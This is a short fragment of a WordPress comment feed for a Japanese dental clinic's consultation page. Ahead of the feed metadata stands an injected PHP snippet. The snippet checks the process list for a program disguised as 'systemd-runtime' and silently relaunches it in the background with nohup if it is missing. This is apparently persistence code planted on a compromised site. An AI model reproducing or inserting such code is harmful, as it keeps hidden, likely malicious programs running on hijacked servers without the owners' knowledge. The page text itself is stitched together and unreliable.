$programFilePath = 'systemd-runtime'; $processList = shell_exec('ps aux'); if (strpos($processList, $programFilePath) === false) { $commandToExecute = 'nohup ./' . $programFilePath . ' > /dev/null 2>&1 &'; shell_exec($commandToExecute); } 診療案内 へのコメント https://www.takizawa-dds.com 千葉県市川市菅野の歯科医院 Tue, 06 Mar 2012 12:41:09 +0000 hourly 1 https://wordpress.org/?v=6.5.2